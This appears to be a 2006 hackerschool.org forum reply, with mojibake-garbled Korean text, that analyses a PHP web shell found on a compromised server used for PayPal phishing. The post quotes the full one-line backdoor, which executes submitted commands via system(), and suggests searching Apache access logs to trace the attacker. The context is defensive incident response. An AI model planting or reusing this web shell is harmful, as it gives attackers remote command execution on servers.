Å©·¡Å· ÇÇÇØ

 423, 8/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=217 [º¹»ç]


===============================================================================
>¿î¿µÇÏ°í ÀÖ´Â ¼­¹ö¿¡
><?if(count($_GET)) extract($_GET);if(count($_POST)) extract($_POST);if(count($_SERVER)) extract($_SERVER);echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd><input type=submit></form><hr>";if($cmd){$cmd = str_replace("\\", "", $cmd);echo "<pre>"; system($cmd); echo "</pre>";}?>
>
>À§ ÄÚµå¿Í ÇÔ²² paypal ÇǽÌÀ» ´çÇÏ¿´½À´Ï´Ù.
>À§ÀÇ ÄÚµåÀÇ ºÐ¼®À» ÇÊ¿ä·Î ÇÕ´Ï´Ù.
>±×·³ ¸¹Àº Á¶¾ð ºÎŹµå¸³´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
===============================================================================

ÇØ´ç ¼Ò½º ÄÚµå´Â backdoorÀÇ ÀÏÁ¾À¸·Î¼­, °ø°ÝÀÚ°¡ Àü´ÞÇÑ ¹®ÀÚ¿­À»

À¥ ¼­¹ö ±ÇÇÑÀÇ ½© ¸í·ÉÀ¸·Î ½ÇÇàÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù.

À§ ¼Ò½º ÄÚµå Áß Çٽɸ¸ ³²±â¸é <? system($cmd); ?> °¡ µË´Ï´Ù.

$cmd º¯¼ö·Î Àü´ÞµÈ ¹®ÀÚ¿­À» system ÇÔ¼ö·Î ½ÇÇàÇÑ´Ü ¸»ÀÔ´Ï´Ù.

´ëÀÀ ¹æ¾ÈÀ¸·Î½á..

¸ÕÀú, À§ ¼Ò½º ÄÚµåÀÇ ÆÄÀϸíÀ» À¥ ¼­¹ö ·Î±×¿¡¼­ °Ë»öÇØ º¸½Ã±â ¹Ù¶ø´Ï´Ù.

¿¹·Î, ¾ÆÆÄÄ¡¶ó¸é grep xxx.php /var/log/httpd/access_log °°Àº ¹æ¹ýÀ¸·Î

°Ë»öÇÏ½Ã¸é µË´Ï´Ù.

±×·³ ÀÌ ¹éµµ¾î ÆÄÀÏÀ» ¿äûÇÑ ·Î±×°¡ ³ª¿Ã °ÍÀÔ´Ï´Ù. (¸¸¾à °ø°ÝÀÚ°¡ ROOT

±ÇÇѱîÁö ȹµæÇÏ¿© ·Î±×¸¦ Áö¿ö¹ö·È´Ù¸é ³ª¿ÀÁö ¾ÊÀ» ¼öµµ ÀÖ½À´Ï´Ù.)

·Î±×°¡ ³ª¿Ô´Ù¸é IP¿Í REFERER ºÎºÐÀ» º¸°í °ø°ÝÀÚÀÇ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖÀ¸¸ç,

ÃÖÃÊ xxx.php°¡ ·Î±×¿¡ ³²Àº ½Ã°£À» ±âÁ¡À¸·Î ÁÖº¯ ·Î±×¸¦ ºÐ¼®ÇØ º¸½Ã¸é

°ø°ÝÀÚ°¡ ¾î¶² ¹æ¹ýÀ» ÀÌ¿ëÇؼ­ ¼­¹ö¿¡ ħÅõÇß´ÂÁö ãÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù. (À¥ÇØÅ·À¸·Î ħÅõÇß´Ù°í °¡Á¤)

ÀÌ Á¤º¸¸¦ ±â¹ÝÀ¸·Î Ãë¾àÁ¡ ÆÐÄ¡¿Í °ø°ÝÀÚ¿¡ ´ëÇÑ ¹ýÀû ´ëÀÀÀ» ÇϽñ⠹ٶø´Ï´Ù.

  Hit : 4113     Date : 2006/06/01 07:05



    
soarrr À½ ±×·¸±º¿ä Á¶¾ð Á¤¸» °¨»çµå¸³´Ï´Ù.. 2006/06/01  
283   ÇØÅ· ÇÁ·Î±×·¥ Áú¹®ÀÔ´Ï´Ù.[8]     millor
01/13 4125
282     [re] ±×·³ ÀÌ·±°æ¿ìµµ ÇØÅ·ÀÌ µÇ´ÂÁö¿ä     ¹«¼ÒÀ¯
12/20 4124
281     [re] ÇØÅ·¶§¹®¿¡ ¹ÌÄ¡°Ú¾î¿ä~¤Ð¤Ð[2]     mnet21
03/08 4124
280   ¾Æ·¡¿¡ À̾î IPÃßÀû¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù.[2]     asd3253
11/02 4120
279   Ãʺ¸Àä. Àúµµ Á¦´ë·Î ¹è¿öº¸°í½Í½À´Ï´Ù.[4]     dbflgn
12/19 4117
    [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..[1]     ¸Û¸Û
06/01 4112
277   À¥ÇØÅ·À» ´çÇѰɱî¿ä?[5]     odkimtyworlds
10/21 4108
276   ÇØÄ¿°¡ µÇ°í ½ÍÀºµ¥...[7]     fpdltm0
10/30 4106
275   ÀúÈñ ȸ»ç Å©·¡Å· ´çÇÑ°Í °°Àºµ¥.[1]     jinpw
12/06 4101
274   ±Ã±ÀÇÑ°Ô ÀÖ½À´Ï´Ù. À©µµ¿ì¿¡ ¼³Ä¡ÇÑ ÇÁ·Î±×·¥µéÀÌ..[6]     oobtloo
11/05 4097
273   ÇØÅ·¶§¹®¿¡ ¹ÌÄ¡°Ú¾î¿ä~¤Ð¤Ð[1]     nuneun
03/06 4089
272   ´äº¯ ¹Ù¶÷ .. ;; ¹éµµ¾î ÇÁ·Î±×·¥ °ü·Ã[8]     fragrantra
12/22 4079
271   ¹«ÇÑÀçºÎÆÃ[7]     ½È¾î ³»°¡ÇÒ²¨¾ß
02/04 4062
270   key log(ger)ÇÁ·Î±×·¥ »ç¿ë¹ý°ú Áú¹®[4]     ³«Å¸
09/11 4062
269   ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..     soarrr
06/26 4059
268     [re] ¾ÆÀÌÆù ÇØÅ·ÇÑ »ç¶÷[4]     twinz
09/02 4052
267   µðµµ½ºÇØÅ·À¸·Î ¼­¹ö°¡ ´Ù¿îµÈ´Ù¸é ¾î¶»°Ô ȸº¹½ÃÄÑ¾ß Çϳª¿ä??[4]     jungjae5
12/07 4052
266   exeÆÄÀÏ ½ÇÇà ¿¡·¯(º¹±¸¹æ¹ý ±ÞÇØ¿ä!)[2]     cjusanghyun
01/06 4052
265   ÀÌ°ÍÀÌ ÇØÅ·½ÃµµÀϱî¿ä?[3]     as1as
01/08 4044
264   À©µµ¿ì xp¸¦ »ç¿ëÇÏ°í Àִµ¥¿ä xp¿¡¼­ ÇÒ¼ö ÀÖ´Â º¸¾ÈÁ¤Ã¥Àº ¾î¶²°ÍµéÀÌ ÀÖ³ª¿ä?[3]     neshe
10/31 4042
[1][2][3][4][5][6][7] 8 [9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org